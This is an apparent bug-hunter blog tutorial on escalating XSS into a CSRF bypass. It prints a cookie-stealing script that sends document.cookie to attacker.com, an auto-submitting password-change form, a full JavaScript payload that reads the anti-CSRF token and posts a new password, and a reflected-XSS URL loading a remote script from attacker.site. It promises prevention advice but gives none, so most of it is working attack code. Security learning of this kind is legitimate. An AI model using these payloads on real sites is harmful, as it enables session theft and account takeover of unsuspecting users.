Bypass CSRF protection with XSS.


Hello friend, I’m Ahmed, a noob (penetration tester | bug hunter), and today I will talk about escalating XSS to CSRF.

Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) are two common types of web application vulnerabilities that can have severe consequences for both the affected website and its users. In this article, we will explain how an attacker can escalate an XSS vulnerability to a CSRF attack, and how to prevent these types of attacks.

First, what is XSS:

XSS is a type of security vulnerability that allows an attacker to inject malicious code (usually JavaScript) into a web page viewed by other users. The injected code can be used to steal sensitive information, such as login credentials, or to perform actions on behalf of the victim, such as making a purchase or changing account settings.

For example, if a website allows users to post comments, but does not properly sanitize user input, an attacker could post a comment containing a malicious script, such as:

<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script>

When other users view the comment, the malicious script will execute, stealing the user’s cookies and sending them to the attacker’s server.

There are two types of XSS attacks: stored and reflected. Stored XSS attacks occur when the attacker is able to inject malicious code into a web page that is then permanently stored on the server and served to all users who visit the page. Reflected XSS attacks occur when the malicious code is not stored on the server at all: it is carried in the victim’s own request (for example in a URL parameter) and echoed back in the response, so it executes only when the victim opens that crafted page.

Second, what is CSRF:

CSRF is a type of attack that allows an attacker to perform actions on behalf of a victim, without the victim’s knowledge or consent. This is done by tricking the victim into visiting a malicious website or clicking on a malicious link while they are logged into a vulnerable website. Once the victim visits the malicious website, the attacker can use the victim’s cookies and session information to perform actions on the vulnerable website, such as changing account settings or making a purchase.

For example, an attacker could create a malicious website that contains the following HTML code:

<form method="POST" action="http://vulnerable.com/changepassword">
  <input type="hidden" name="newpassword" value="attackerpassword">
  <input type="submit" value="Change Password">
</form>

When a victim visits the malicious website while logged into the vulnerable website, the form will be automatically submitted, changing the victim’s password to “attackerpassword”.

Now, how can we combine the two vulnerabilities to get a high impact 🤑🤑🤑

A CSRF vulnerability can be used in conjunction with an XSS vulnerability to bypass the CSRF protection. In this type of attack, the attacker injects a malicious script into a web page that the victim visits. The script then sends a forged request to the web application with the victim’s cookies, allowing the attacker to perform actions on the victim’s behalf.

Here is an example of how this type of attack can be carried out:

1. The attacker finds an XSS vulnerability in a web application, which allows them to inject a malicious script into a web page viewed by the victim.
2. The script creates a hidden form on the page with the necessary parameters for a sensitive action, such as changing the victim’s password. The script also sets the action of the form to a URL on the web application.
3. The script then automatically submits the form, sending a forged request with the victim’s cookies to the web application. The request appears to be coming from the victim, and the server processes it without checking for a CSRF token.
4. The attacker can then perform the sensitive action on the victim’s behalf, such as changing their password.

Malicious JavaScript payload that changes the victim’s password to “hacked”:

document.addEventListener("DOMContentLoaded", function () {
  // Read the site's own anti-CSRF token straight out of the page: this is why
  // a per-session token does not stop a request forged by injected script.
  const token = document.getElementById("token").value;

  const xhr = new XMLHttpRequest();
  //const params="token="+token+"&bio=Hacked!!!"
  const params = "token=" + token + "&password=hacked";
  xhr.addEventListener("load", () => {
    alert("Your profile was hacked! Your password is changed to hacked!!");
    location.href = "profile.php";
  });
  // Same-origin request, so the browser attaches the victim's session cookie.
  xhr.open("POST", "profile.php", true);
  xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');

  xhr.send(params);
});

If we put that code inside a JS file, reference it in the src attribute of the XSS payload, and the victim opens that URL, their password will be changed to “hacked” and the alert “Your profile was hacked! Your password is changed to hacked!!” will pop up.

https://vulnerable.site/profile.php?msg=<script src='https://attacker.site/attacker/script.js'></script>

The following is the script tag that loads the JS file in which we kept the payload:

<script src='https://attacker.site/attacker/script.js'></script>